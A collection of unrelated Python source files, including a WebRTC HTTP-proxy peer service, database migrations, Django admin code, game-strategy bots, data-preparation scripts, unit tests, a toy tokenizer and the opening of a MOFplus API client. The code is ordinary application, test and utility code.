        if (response.status != 204):
            # HTTP status 204 means: Success. No content.
            await peerConnection.send(response_content)
    @peerConnection.on(ConnectionEventType.Close)
    async def pc_close():
        logger.info('Connection to remote peer closed')
async def pnp_service_connect() -> Peer:
    """Create a Peer instance and register with PnP signaling server."""
    # Create own peer object with connection to shared PeerJS server
    logger.info('creating peer')
    # If we already have an assigned peerId, we will reuse it forever.
    # We expect that peerId is crypto secure. No need to replace.
    # Unless the user explicitly requests a refresh.
    global savedPeerId
    global config
    logger.info('last saved savedPeerId {}', savedPeerId)
    # A fresh session token is generated for every connection attempt.
    new_token = util.randomToken()
    logger.info('Peer session token {}', new_token)
    options = PeerOptions(
        host=config['signaling_server'],
        port=config['port'],
        secure=config['secure'],
        token=new_token,
        config=RTCConfiguration(
            iceServers=[RTCIceServer(**srv) for srv in config['ice_servers']]
        )
    )
    peer = Peer(id=savedPeerId, peer_options=options)
    logger.info('pnpService: peer created with id {} , options: {}',
                peer.id,
                peer.options)
    await peer.start()
    logger.info('peer activated')
    _setPnPServiceConnectionHandlers(peer)
    return peer
async def make_discoverable(peer=None):
    """Enable remote peers to find and connect to this peer."""
    logger.debug('Enter peer discoverable.')
    logger.debug('Before _is_shutting_down')
    global _is_shutting_down
    logger.debug('Making peer discoverable.')
    # Reconnection loop: keeps this peer registered with the signaling
    # server and in its peer room until shutdown is requested.
    while not _is_shutting_down:
        logger.debug('Discovery loop.')
        logger.debug('peer status: {}', peer)
        try:
            if not peer or peer.destroyed:
                logger.info('Peer destroyed. Will create a new peer.')
                peer = await pnp_service_connect()
            elif peer.open:
                await join_peer_room(peer=peer)
            elif peer.disconnected:
                logger.info('Peer disconnected. Will try to reconnect.')
                await peer.reconnect()
            else:
                logger.info('Peer still establishing connection. {}', peer)
        except Exception as e:
            logger.exception('Error while trying to join local peer room. '
                             'Will retry in a few moments. '
                             'Error: \n{}', e)
            if peer and not peer.destroyed:
                # something is not right with the connection to the server
                # lets start a fresh peer connection
                logger.info('Peer connection was corrupted. Detroying peer.')
                await peer.destroy()
                peer = None
                logger.debug('peer status after destroy: {}', peer)
        # Poll/retry interval between discovery attempts.
        await asyncio.sleep(3)
def _config_logger():
    """Configure the loguru sink and level from the loaded config."""
    global config
    # NOTE(review): with a config dict present but no "log_level" key the
    # fallback is "DEBUG", not DEFAULT_LOG_LEVEL ("INFO") — confirm this
    # asymmetry is intended.
    log_level = config.get("log_level", "DEBUG") if config else DEFAULT_LOG_LEVEL
    logger.remove()
    logger.add(sys.stdout, colorize=True, level=log_level, enqueue=True)
    logger.info(f'Log level is: {log_level}')
async def _start():
    """Create the shared HTTP session and run the discovery loop until shutdown."""
    global http_session, peer
    # One shared aiohttp session serves every proxied request in this process.
    http_session = aiohttp.ClientSession()
    logger.info('Calling make_discoverable')
    await make_discoverable(peer=peer)
    logger.info('Exited make_discoverable')
    await logger.complete()
async def _shutdown():
    """Flag shutdown, destroy the peer, and close the shared HTTP session."""
    global _is_shutting_down, peer, http_session
    # Setting the flag makes make_discoverable() exit its loop.
    _is_shutting_down = True
    logger.debug('Shutting down. Peer {}', peer)
    if peer:
        logger.info('Destroying peer {}', peer)
        await peer.destroy()
    else:
        logger.info('Peer is None')
    await http_session.close()
@logger.catch
def main():
    """Entry point: load saved peer id and config, then run the asyncio loop."""
    # args = None
    # parser = argparse.ArgumentParser(description="Data channels ping/pong")
    # parser.add_argument("role", choices=["offer", "answer"])
    # parser.add_argument("--verbose", "-v", action="count")
    # add_signaling_arguments(parser)
    # args = parser.parse_args()
    # if args.verbose:
    logger.info('Calling _loadPeerId()')
    _loadPeerId()
    logger.info('After _loadPeerId()')
    exists = _loadConfig()
    logger.info('Calling _loadConfig()')
    if not exists:
        # First run: persist the default configuration for next time.
        _saveConfig()
    _config_logger()
    logger.info('After _loadConfig()')
    # add formatter to ch
    # signaling = create_signaling(args)
    # signaling = AmbianicPnpSignaling(args)
    # pc = RTCPeerConnection()
    # if args.role == "offer":
    #     coro = _run_offer(pc, signaling)
    # else:
    #     coro = _run_answer(pc, signaling)
    # run event loop
    loop = asyncio.get_event_loop()
    try:
        logger.info('\n>>>>> Starting http-proxy over webrtc. <<<<')
        loop.run_until_complete(_start())
        loop.run_forever()
    except KeyboardInterrupt:
        logger.info('KeyboardInterrupt detected.')
    finally:
        # Always tear down the peer and HTTP session, even on errors.
        logger.info('Shutting down...')
        loop.run_until_complete(_shutdown())
        loop.close()
        logger.info('All done.')
# Script entry point.
if __name__ == "__main__":
    main()
"""empty message
Revision ID: 3bfc81510c43
Revises: 2505ad08a7d0
Create Date: 2020-08-12 12:12:22.439674
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
# These constants link this migration into Alembic's dependency graph;
# do not edit them by hand.
revision = '3bfc81510c43'
down_revision = '2505ad08a7d0'
branch_labels = None
depends_on = None
def upgrade():
    """Apply the migration: drop the post.youtube_id column."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('post', 'youtube_id')
    # ### end Alembic commands ###
def downgrade():
    """Revert the migration: restore the nullable post.youtube_id varchar column."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('post', sa.Column('youtube_id', sa.VARCHAR(length=255), nullable=True))
    # ### end Alembic commands ###
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
long_desc = '''
This package contains the mscgen_ Sphinx_ extension.
.. _mscgen: http://www.mcternan.me.uk/mscgen/
.. _Sphinx: http://sphinx.pocoo.org/
Allow mscgen-formatted Message Sequence Chart (MSC) graphs to be included in
Sphinx-generated documents inline. For example::
.. msc::
hscale = "0.5";
a,b,c;
a->b [ label = "ab()" ] ;
b->c [ label = "bc(TRUE)"];
c=>c [ label = "process()" ];
'''
requires = ['Sphinx>=0.6']
setup(
name='sphinxcontrib-mscgen',
version='0.4',
url='http://packages.python.org/sphinxcontrib-mscgen/',
download_url='http://pypi.python.org/pypi/sphinxcontrib-mscgen',
license='BOLA',
author='Leandro Lucarella',
author_email='llucax@gmail.com',
description='mscgen Sphinx extension',
long_description=long_desc,
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: Public Domain',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Documentation',
'Topic :: Utilities',
],
platforms='any',
packages=find_packages(),
include_package_data=True,
install_requires=requires,
namespace_packages=['sphinxcontrib'],
)
|
import numpy as np
from tg_config import *
def random_mistake(origin_func):
    """Decorator: with probability game_configs['mistake_prob'] percent,
    flip the sign of the wrapped strategy's move.

    The wrapped strategy is now called exactly once (the original called it
    in both branches); the random draw still happens before the strategy
    call so the RNG stream is unchanged.
    """
    def wrapper(self, *args):
        prob = np.random.randint(100)
        origin_result = origin_func(self, *args)
        if prob < game_configs['mistake_prob']:
            # Mistake: invert the intended move.
            return -1 * origin_result
        return origin_result
    return wrapper
class Bot(object):
    """Base tournament player: keeps per-opponent move histories and a score."""

    def __init__(self, pos, total_num):
        self.pos = pos      # this player's index in the tournament
        self.score = 0      # accumulated score
        # Histories keyed by the opponent's index as a string, one entry
        # per opponent (everyone except ourselves).
        self.opp_logs = {str(i): [] for i in range(total_num) if i != pos}
        self.my_logs = {str(i): [] for i in range(total_num) if i != pos}

    def strategy(self, opp_pos):
        """Default strategy: uniformly random move in {0, 1}."""
        #TODO different strategy can be added here
        return np.random.randint(2)

    def print_score(self):
        print("Player_%d (%s): %d" % (self.pos, self.__class__.__name__, self.score))

    def print_my_logs(self):
        for opponent, moves in self.my_logs.items():
            print('Player_%s: %s' % (opponent, str(moves)))

    def print_opp_logs(self):
        for opponent, moves in self.opp_logs.items():
            print('Player_%s: %s' % (opponent, str(moves)))
class Follower(Bot):
    """Repeats the opponent's previous move; plays -1 when no history exists."""
    @random_mistake
    def strategy(self, opp_pos):
        history = self.opp_logs[str(opp_pos)]
        return history[-1] if history else -1
class Follower_2(Bot):
    """Plays 1 only after the opponent played 1 twice in a row; otherwise -1."""
    @random_mistake
    def strategy(self, opp_pos):
        history = self.opp_logs[str(opp_pos)]
        try:
            return 1 if history[-1] == history[-2] == 1 else -1
        except IndexError:
            # Fewer than two observed moves so far.
            return -1
class Gambler(Bot):
    """Switches permanently to 1 once the opponent has ever played 1."""
    @random_mistake
    def strategy(self, opp_pos):
        return 1 if 1 in self.opp_logs[str(opp_pos)] else -1
class Pink(Bot):
    """Constant strategy: always plays -1 (the random_mistake decorator may flip it)."""
    @random_mistake
    def strategy(self, opp_pos):
        return -1
class Black(Bot):
    """Constant strategy: always plays 1 (the random_mistake decorator may flip it)."""
    @random_mistake
    def strategy(self, opp_pos):
        return 1
class Single_Mind(Bot):
    """Keeps its last move after the opponent played -1; flips it otherwise."""
    @random_mistake
    def strategy(self, opp_pos):
        history = self.opp_logs[str(opp_pos)]
        mine = self.my_logs[str(opp_pos)]
        try:
            return mine[-1] if history[-1] == -1 else -1 * mine[-1]
        except IndexError:
            # No moves recorded yet: open with -1.
            return -1
class Sherlock(Bot):
    """Probes with a fixed 4-move opening, then reacts to the opponent's record."""
    @random_mistake
    def strategy(self, opp_pos):
        opening = [-1, 1, -1, -1]
        history = self.opp_logs[str(opp_pos)]
        seen = len(history)
        if seen < 4:
            # Still in the scripted opening sequence.
            return opening[seen]
        if 1 in history:
            return history[-1]
        return 1
|
from django.contrib import admin
from django.db.models import Count
from django.contrib.auth.admin import UserAdmin
import editor.models
# Plain registrations: these models use the stock ModelAdmin.
admin.site.register(editor.models.SiteBroadcast)
admin.site.register(editor.models.Tip)
admin.site.register(editor.models.NewExam)
admin.site.register(editor.models.NewQuestion)
admin.site.register(editor.models.Theme)
admin.site.register(editor.models.Subject)
admin.site.register(editor.models.Topic)
admin.site.register(editor.models.AbilityFramework)
admin.site.register(editor.models.AbilityLevel)
class TaxonomyAdmin(admin.ModelAdmin):
    # Restrict the edit form to name/description; nodes are managed separately.
    fields = ['name','description']
admin.site.register(editor.models.Taxonomy,TaxonomyAdmin)
admin.site.register(editor.models.TaxonomyNode)
# allow users to be sorted by date joined
# (mutates the stock django.contrib.auth UserAdmin class in place)
UserAdmin.list_display += ('date_joined',)
UserAdmin.list_filter += ('date_joined',)
class LicenceAdmin(admin.ModelAdmin):
    # Surface the licence permission flags in the changelist.
    list_display = ['name', 'short_name', 'can_reuse', 'can_modify', 'can_sell']
admin.site.register(editor.models.Licence, LicenceAdmin)
class ExtensionAdmin(admin.ModelAdmin):
    # Show ownership and visibility alongside the extension's location.
    list_display = ['name', 'location', 'public', 'author']
admin.site.register(editor.models.Extension, ExtensionAdmin)
class EditorTagAdmin(admin.ModelAdmin):
    """Admin for tags: shows usage counts and supports merging and officialising."""
    list_display = ['name', 'show_used_count', 'official']
    actions = ['make_tag_official', 'merge_tags']
    def get_queryset(self, request):
        # Annotate each tag with how many items reference it so the
        # changelist can sort on the count.
        return editor.models.EditorTag.objects.annotate(used_count=Count('tagged_items'))
    def show_used_count(self, instance):
        return instance.used_count
    show_used_count.admin_order_field = 'used_count'
    show_used_count.short_description = 'Times used'
    def make_tag_official(self, request, queryset):
        queryset.update(official=True)
    make_tag_official.short_description = 'Make official'
    def merge_tags(self, request, queryset):
        # Merge the selected tags into the most-used one.
        if len(queryset) == 1:
            return
        tags = list(queryset)
        # NOTE(review): the sort key is the class attribute
        # EditorTag.used_count — confirm the model defines it; if the
        # annotation from get_queryset was intended, the key should be
        # e.g. lambda t: t.used_count.
        tags.sort(key=editor.models.EditorTag.used_count, reverse=True)
        merged_tag = tags[0]
        # Re-point every tagging of the losing tags at the winner.
        editor.models.TaggedItem.objects.filter(tag__in=tags[1:]).update(tag=merged_tag)
        if queryset.filter(official=True).exists():
            merged_tag.official = True
            merged_tag.save()
        queryset.exclude(pk=merged_tag.pk).delete()
        self.message_user(request, "Tags %s merged into '%s'" % (', '.join("'%s'" % t.name for t in tags), merged_tag.name))
    merge_tags.short_description = 'Merge tags'
admin.site.register(editor.models.EditorTag, EditorTagAdmin)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Justin Cunningham
import pandas as pd
import re
import sys
import argparse
from .demutate_corpus import DemutateText
from .utils import pad_sentence, add_window
reg = re.compile("[^a-záéíóú]")
def create_parser(subparsers=None):
    """Build the 'demutate-window' argument parser.

    :param subparsers: optional argparse subparsers object to attach to; when
        None a standalone ArgumentParser is created.
    :return: the configured parser (BUG FIX: the function previously fell off
        the end and returned None, so callers crashed on the result).
    """
    description = ("creates a file with demutated tokens surrounded by a window of "
                   "tokens to be used in training")
    if subparsers:
        parser = subparsers.add_parser('demutate-window', description=description)
    else:
        parser = argparse.ArgumentParser('demutate-window', description=description)
    parser.add_argument(
        '--input', '-i', type=argparse.FileType('r'), default=sys.stdin,
        metavar='PATH',
        help='Input file'
    )
    parser.add_argument(
        '--output', '-o', type=argparse.FileType('w'), default=sys.stdout,
        metavar='PATH',
        help='Output file'
    )
    parser.add_argument(
        '--mask', '-p', type=str,
        metavar='STRING', default='<mask>',
        help='Mask Token (Default: <mask>)'
    )
    parser.add_argument(
        '--language', '-l', type=str,
        metavar='STRING',
        help='Language of text you wish to demutate'
    )
    parser.add_argument(
        '--window', '-w', type=int,
        metavar='VALUE',
        help='The amount of tokens on either side of the central token'
    )
    return parser
def demutate_with_window(input_text, win_len, language, output_file=None, mask='<mask>'):
    """Build a training dataset of demutated tokens with context windows.

    :param input_text: Path to text file (or list of paths)
    :param win_len: Length of the window on each side
    :param language: Language of the text
    :param output_file: Path to output file; when given the frame is written
        as CSV and nothing is returned
    :param mask: Mask token used to pad short windows
    :return: DataFrame with 'sentence' and 'label' columns (when no output file)
    """
    if not isinstance(input_text, list):
        input_text = [input_text]

    demutation = DemutateText(language)
    corpus, labels = demutation.demutate_corpus(input_text)

    windowed = []
    for entry in corpus:
        tokens = str(entry).split()
        last_index = len(tokens) - 1
        for position, token in enumerate(tokens):
            window, lsl, rsl = add_window(tokens, token, win_len, position, last_index)
            # Windows near sentence edges come back short; pad them out to
            # the full 2*win_len + 1 width with the mask token.
            if len(window) != (2 * win_len) + 1:
                window = pad_sentence(window, win_len, lsl, rsl, mask)
            windowed.append(' '.join(window))

    frame = pd.DataFrame(zip(windowed, labels), columns=['sentence', 'label'])
    if output_file:
        frame.to_csv(output_file, index=False)
        return None
    return frame
|
import base64
import hashlib
from os.path import join
from random import Random
import pandas as pd
from config import DATA_DIR, RANDOM_SEED
from modapt.utils import save_json
from tqdm import tqdm
# Seed a private RNG so the subsample is reproducible.
RNG = Random()
RNG.seed(RANDOM_SEED)

_SUBSAMPLE_SIZE = 10000
_POLARITY_TO_LABEL = {"positive": "pos", "negative": "neg"}

df = pd.read_csv(
    join(DATA_DIR, "sentiment", "raw", "imdb", "IMDB Dataset.csv"),
)

# Draw a fixed-size set of distinct row indices.
idxs = RNG.sample(range(len(df)), _SUBSAMPLE_SIZE)

dataset_dict = {}
for idx in tqdm(idxs):
    row = df.iloc[idx]
    # BUG FIX: row[0]/row[1] is deprecated positional fallback on a
    # label-indexed Series; use .iloc for positional access.
    text = row.iloc[0]
    polarity = row.iloc[1]
    polarity = _POLARITY_TO_LABEL[polarity]
    # Short, stable id derived from the review text itself.
    hasher = hashlib.sha1(text.encode())
    review_id = base64.urlsafe_b64encode(hasher.digest()[:6]).decode()
    print(review_id, polarity, text)
    new_id = f"imdb.{review_id}"
    dataset_dict[new_id] = {"id": new_id, "text": text, "polarity": polarity}

save_json(dataset_dict, join(DATA_DIR, "sentiment", "imdb.json"))
|
import json
import logging
from django.db import connection
from django.http import HttpResponse
from rest_framework.response import Response
from rest_framework.views import APIView
from .database import Database
logger = logging.getLogger("django")
class TestView(APIView):
    """Smoke-test endpoint: returns every row of TestTable as dicts."""

    def get(self, request):
        try:
            database = Database()
            with connection.cursor() as cursor:
                cursor.execute("select * from TestTable")
                data = database.dictfetchall(cursor)
            return Response({
                "data": data
            })
        except Exception as ex:
            # BUG FIX: json.dumps(ex.args) itself raises TypeError when the
            # exception args are not JSON-serializable, and the original call
            # discarded the traceback. logger.exception logs both safely.
            logger.exception('error occurs %s', ex)
            # Response returned with failed status and message error
            return Response({
                "data": "error"
            })
|
# Generated by Django 2.0.1 on 2018-03-22 15:05
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: drops the obsolete object_state column
    # from TransitionLog.

    dependencies = [
        ('django_workflow', '0009_auto_20180226_1444'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='transitionlog',
            name='object_state',
        ),
    ]
|
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import weakref
import IECore
import Gaffer
import GafferUI
import GafferTest
import GafferUITest
class GraphEditorTest( GafferUITest.TestCase ) :
    """Tests for GafferUI.GraphEditor: construction, lifetime, titles,
    automatic layout and root reparenting.

    FIX: the deprecated unittest alias failUnless (removed in Python 3.12)
    is replaced by assertTrue throughout; assertions are unchanged otherwise.
    """

    def testCreateWithExistingGraph( self ) :

        s = Gaffer.ScriptNode()
        s["add1"] = GafferTest.AddNode()
        s["add2"] = GafferTest.AddNode()
        s["add1"]["op1"].setInput( s["add2"]["sum"] )

        g = GafferUI.GraphEditor( s )
        self.assertTrue( g.graphGadget().nodeGadget( s["add1"] ).node() is s["add1"] )
        self.assertTrue( g.graphGadget().nodeGadget( s["add2"] ).node() is s["add2"] )
        self.assertTrue( g.graphGadget().connectionGadget( s["add1"]["op1"] ).dstNodule().plug().isSame( s["add1"]["op1"] ) )

    def testGraphGadgetAccess( self ) :

        s = Gaffer.ScriptNode()
        ge = GafferUI.GraphEditor( s )
        g = ge.graphGadget()
        self.assertTrue( isinstance( g, GafferUI.GraphGadget ) )

    def testLifetime( self ) :

        # The editor must not outlive its last external reference.
        s = Gaffer.ScriptNode()
        s["n"] = GafferTest.AddNode()
        e = GafferUI.GraphEditor( s )
        we = weakref.ref( e )
        del e
        self.assertEqual( we(), None )

    def testTitle( self ) :

        s = Gaffer.ScriptNode()
        g = GafferUI.GraphEditor( s )
        self.assertEqual( g.getTitle(), "Graph Editor" )

        b1 = Gaffer.Box()
        b2 = Gaffer.Box()
        s["a"] = b1
        s["a"]["b"] = b2

        # Track the title via the changed signal so we verify notification,
        # not just the getter.
        self.__signalUpdatedTitle = g.getTitle()
        def titleChangedHandler( widget ) :
            self.__signalUpdatedTitle = widget.getTitle()
        g.titleChangedSignal().connect( titleChangedHandler, scoped = False )

        g.graphGadget().setRoot( b1 )
        self.assertEqual( self.__signalUpdatedTitle, "Graph Editor : a" )
        g.graphGadget().setRoot( b2 )
        self.assertEqual( self.__signalUpdatedTitle, "Graph Editor : a / b" )
        b1.setName( "c" )
        self.assertEqual( self.__signalUpdatedTitle, "Graph Editor : c / b" )
        b2.setName( "d" )
        self.assertEqual( self.__signalUpdatedTitle, "Graph Editor : c / d" )
        g.setTitle( "This is a test!" )
        self.assertEqual( self.__signalUpdatedTitle, "This is a test!" )

    def testAutomaticLayout( self ) :

        s = Gaffer.ScriptNode()
        s["n1"] = GafferTest.AddNode()
        s["n2"] = GafferTest.AddNode()
        s["n2"]["op1"].setInput( s["n1"]["sum"] )
        s["b"] = Gaffer.Box()
        s["b"]["n1"] = GafferTest.AddNode()
        s["b"]["n2"] = GafferTest.AddNode()
        s["b"]["n2"]["op1"].setInput( s["b"]["n1"]["sum"] )

        with GafferUI.Window() as w :
            graphEditor = GafferUI.GraphEditor( s )
        w.setVisible( True )
        self.waitForIdle( 10000 )

        def assertLower( graphGadget, n1, n2 ) :
            # n1 should be laid out below n2 (downstream nodes go lower).
            self.assertLess( graphGadget.getNodePosition( n1 ).y, graphGadget.getNodePosition( n2 ).y )

        self.assertEqual( graphEditor.graphGadget().unpositionedNodeGadgets(), [] )
        assertLower( graphEditor.graphGadget(), s["n2"], s["n1"] )

        graphEditor.graphGadget().setRoot( s["b"] )
        self.waitForIdle( 10000 )
        self.assertEqual( graphEditor.graphGadget().unpositionedNodeGadgets(), [] )
        assertLower( graphEditor.graphGadget(), s["b"]["n2"], s["b"]["n1"] )

        s["b"]["n3"] = GafferTest.AddNode()
        s["b"]["n3"]["op1"].setInput( s["b"]["n2"]["sum"] )
        self.waitForIdle( 10000 )
        self.assertEqual( graphEditor.graphGadget().unpositionedNodeGadgets(), [] )
        assertLower( graphEditor.graphGadget(), s["b"]["n3"], s["b"]["n2"] )

    def testRootReparenting( self ) :

        # This test deliberately keeps b alive to mimic
        # the effects of an UndoScope or similar.
        s = Gaffer.ScriptNode()
        e = GafferUI.GraphEditor( s )

        b = Gaffer.Box()
        s["b"] = b
        e.graphGadget().setRoot( b )
        self.assertEqual( e.graphGadget().getRoot(), b )

        # Removing the root should fall back to the script root.
        s.removeChild( b )
        self.assertEqual( e.graphGadget().getRoot(), s )

        s["b"] = b
        b["bb"] = Gaffer.Box()
        e.graphGadget().setRoot( b["bb"] )
        self.assertEqual( e.graphGadget().getRoot(), b["bb"] )
        s.removeChild( b )
        self.assertEqual( e.graphGadget().getRoot(), s )

        # Test with actually deleted nodes too
        s["b"] = b
        e.graphGadget().setRoot( b["bb"] )
        self.assertEqual( e.graphGadget().getRoot(), b["bb"] )
        del b
        del s["b"]
        self.assertEqual( e.graphGadget().getRoot(), s )
# Allow running this test file directly.
if __name__ == "__main__":
    unittest.main()
|
from enum import Enum
string = """proc main() -> unit {
print("Hello World!")
}"""
class TokenKind(Enum):
    """Lexical categories produced by tokenizer()."""
    NOUN = 1     # identifier / keyword
    LBRACE = 2   # (
    RBRACE = 3   # )
    ARROW = 4    # ->
    LCURLY = 5   # {
    RCURLY = 6   # }
    STRING = 7   # quoted literal
    MINUS = 8    # -
    # BUG FIX: a duplicate `STRING = 9` member was removed. Enum forbids
    # reusing a member name and raises `TypeError: Attempted to reuse key`
    # at class-creation time, so the module could not even be imported.
class Token:
    """A single lexical token together with its source position."""

    def __init__(self, line, pos, kind, contents):
        # Source position (1-based line, column within the line).
        self.line, self.pos = line, pos
        # Token category (a TokenKind) and its verbatim text payload.
        self.kind, self.contents = kind, contents
def forward(s, start, last):
    """Return the inclusive slice of *s* from index start through last."""
    end = last + 1
    return s[start:end]
def tokenizer(program):
    """Tokenize *program* into a list of Token objects.

    Fixes over the previous version:
    - ``elif char == '"' or "'":`` was always truthy (the string "'" is
      truthy), making the final unknown-char branch unreachable;
    - the closing-quote test ``!= ('"' or "'")`` only ever compared against
      ``"``, so single-quoted strings never terminated correctly;
    - ``line`` was never incremented on newlines;
    - a trailing ``-`` raised IndexError on the ``program[idx + 1]`` lookahead;
    - a one-letter identifier followed by a symbol swallowed that symbol;
    - ``pos`` after NOUN/STRING tokens was set to an absolute file index
      instead of advancing the column.
    """
    limit = len(program) - 1
    idx = 0
    line = 1
    pos = 0
    tokens = []
    while idx <= limit:
        char = program[idx]
        if char == " ":
            idx += 1
            pos += 1
        elif char.isalpha():
            # Identifier: a letter followed by letters/underscores.
            last = idx
            while last < limit and (program[last + 1].isalpha() or program[last + 1] == "_"):
                last += 1
            word = forward(program, idx, last)
            tokens.append(Token(line, pos, TokenKind.NOUN, word))
            pos += last + 1 - idx
            idx = last + 1
        elif char == "(":
            tokens.append(Token(line, pos, TokenKind.LBRACE, "("))
            idx += 1
            pos += 1
        elif char == ")":
            tokens.append(Token(line, pos, TokenKind.RBRACE, ")"))
            idx += 1
            pos += 1
        elif char == "-":
            # Guard the lookahead so a trailing '-' cannot raise IndexError.
            if idx < limit and program[idx + 1] == ">":
                tokens.append(Token(line, pos, TokenKind.ARROW, "->"))
                idx += 2
                pos += 2
            else:
                tokens.append(Token(line, pos, TokenKind.MINUS, "-"))
                idx += 1
                pos += 1
        elif char == "{":
            tokens.append(Token(line, pos, TokenKind.LCURLY, "{"))
            idx += 1
            pos += 1
        elif char == "}":
            tokens.append(Token(line, pos, TokenKind.RCURLY, "}"))
            idx += 1
            pos += 1
        elif char == "\n":
            idx += 1
            line += 1  # BUG FIX: the line counter previously never advanced.
            pos = 0
        elif char in ('"', "'"):
            # String literal: scan to the matching quote character.
            quote = char
            last = idx + 1
            while last <= limit and program[last] != quote:
                last += 1
            contents = program[idx + 1:last]
            tokens.append(Token(line, pos, TokenKind.STRING, contents))
            pos += last + 1 - idx
            idx = last + 1
        else:
            print(f"unknown char {char}")
            break
    return tokens
|
"""
Tests for the data_download module
Includes three tests for the each of the two data functions
"""
import unittest
from detention_data_dashboard.data_download import *
class TestDashboard(unittest.TestCase):
    """Unit tests for the data_download helpers."""

    def test_smoke_data1(self):
        """Regional download produces a pandas DataFrame."""
        frame = data_download_reg("West Coast")
        self.assertEqual(str(type(frame)), "<class 'pandas.core.frame.DataFrame'>")

    def test_edge_data1(self):
        """An unrecognised region name raises NameError."""
        with self.assertRaises(NameError):
            data_download_reg("jumping_jacks")

    def test_pattern_data1(self):
        """Every supported region yields a 4x4 frame."""
        for region in ["East Coast", "West Coast", "Southwest", "Midwest", "All"]:
            frame = data_download_reg(region)
            self.assertEqual(frame.shape, (4, 4))

    def test_smoke_data2(self):
        """AOR arrest download produces a pandas DataFrame."""
        frame = data_download_arrests_aor("LOS")
        self.assertEqual(str(type(frame)), "<class 'pandas.core.frame.DataFrame'>")

    def test_edge_data2(self):
        """An unrecognised AOR code raises NameError."""
        with self.assertRaises(NameError):
            data_download_arrests_aor("jumping_jacks")

    def test_pattern_data2(self):
        """Every AOR code yields a 4x2 frame."""
        aor_codes = ['ATL', 'BAL', 'BOS', 'BUF', 'CHI', 'DAL', 'DEN', 'DET', 'ELP',
                     'HOU', 'HQ', 'LOS', 'MIA', 'NEW', 'NOL', 'NYC', 'PHI', 'PHO',
                     'SEA', 'SFR', 'SLC', 'SNA', 'SND', 'SPM', 'WAS']
        for code in aor_codes:
            frame = data_download_arrests_aor(code)
            self.assertEqual(frame.shape, (4, 2))

    def test_smoke_data3(self):
        """ICE detention download produces a pandas DataFrame."""
        frame = data_download_ice_detention()
        self.assertEqual(str(type(frame)), "<class 'pandas.core.frame.DataFrame'>")

    def test_pattern_data3(self):
        """ICE detention data has the expected 100x7 shape."""
        frame = data_download_ice_detention()
        self.assertEqual(frame.shape, (100, 7))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import xmlrpc.client
import ssl
# try to use xmlrpxlibex from https://github.com/benhengx/xmlrpclibex (install with pip3 install xmlrpclibex)
try:
from xmlrpclibex import xmlrpclibex
can_use_socks = True
except ImportError:
can_use_socks = False
import logging
import sys
import os
import re
import molsys
import getpass
from .decorator import faulthandler, download
# Module logger: DEBUG at the logger itself, INFO on the console handler,
# so callers can attach a more verbose handler without reconfiguring.
logger = logging.getLogger("mofplus")
logger.setLevel(logging.DEBUG)
shandler = logging.StreamHandler()
shandler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%m-%d %H:%M')
shandler.setFormatter(formatter)
logger.addHandler(shandler)
# Keep a reference to the original hook so custom_excepthook can delegate.
default_excepthook = sys.excepthook
def custom_excepthook(etype, value, tb):
    """Scrub MOFplus credentials from ProtocolError URLs before the default
    excepthook prints them.

    Arg:
        etype: exception class
        value: exception instance
        tb: traceback object
    """
    if etype is xmlrpc.client.ProtocolError:
        credential_pattern = 'ProtocolError for .*:.*@www.mofplus.org'
        redacted = 'ProtocolError for <USERNAME>:<PW>@www.mofplus.org'
        value.url = re.sub(credential_pattern, redacted, value.url)
    default_excepthook(etype, value, tb)

# Install the scrubbing hook for all uncaught exceptions.
sys.excepthook = custom_excepthook
class user_api(object):
    """Basic API class to talk to MOFplus
    Via the user_api class the API routines of MOFplus which are accessible for normal users and do not affect
    FF parameters can be used.
    Args:
        banner (bool, optional): If True, the MFP API banner is printed to SDTOUT, defaults to False
        api (string, optional): API to connect to, defaults to "user", can be "admin"
    """
    def __init__(self, banner = False, api="user"):
        assert api in ["user", "admin"]
        if banner: self._print_banner()
        # Credential lookup order: ~/.mofplusrc, then the MFPUSER/MFPPW
        # environment variables, then an interactive prompt.
        try:
            logger.info("Get credentials from .mofplusrc")
            self.username, self.pw = self._credentials_from_rc()
        except IOError:
            try:
                logger.warning(".mofplusrc not found!")
                logger.info("Get credentials from environment variables")
                self.username = os.environ['MFPUSER']
